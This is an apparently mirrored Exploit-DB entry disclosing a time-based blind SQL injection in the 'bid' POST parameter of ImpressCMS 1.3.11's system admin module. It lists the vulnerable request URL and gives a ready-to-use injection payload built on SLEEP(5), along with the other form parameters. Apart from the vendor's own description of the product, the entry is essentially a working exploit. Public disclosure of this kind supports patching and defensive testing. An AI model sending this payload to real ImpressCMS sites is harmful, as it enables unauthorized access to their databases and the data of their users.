ImpressCMS 1.3.11 – ‘bid’ SQL Injection

  • 作者: Mehmet Onder
    日期: 2019-01-24
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/46239/
  • # Title: ImpressCMS 1.3.11 - 'bid' SQL Injection
    # Date: 21.01.2019
    # Exploit Author: Mehmet Onder Key
    # Vendor Homepage: http://www.impresscms.org/
    # Software Link:
    https://sourceforge.net/projects/impresscms/files/v1.3.11/impresscms_1.3.11.zip
    # Version: v1.3.11
    # Category: Webapps
    # Tested on: WAMPP @Win
    # Software description:
    ImpressCMS is a community developed Content Management System. With this
    tool maintaining the content of a website becomes as easy as writing a word
    document. ImpressCMS is the ideal tool for a wide range of users: from
    business to community users, from large enterprises to people who want a
    simple, easy to use blogging tool.
    
    # Vulnerabilities:
    # An attacker can access all data following an un/authorized user login
    using the parameter.
    
    
    # POC - SQLi :
    
    # Parameter: bid (POST)
    # Request URL: http://localhost/impress/modules/system/admin.php?bid=12
    
    #Type : time-based blind
    bid=12') AND SLEEP(5) AND ('Bjhx'='Bjhx&fct=blocksadmin&op=up&rtn=Lw==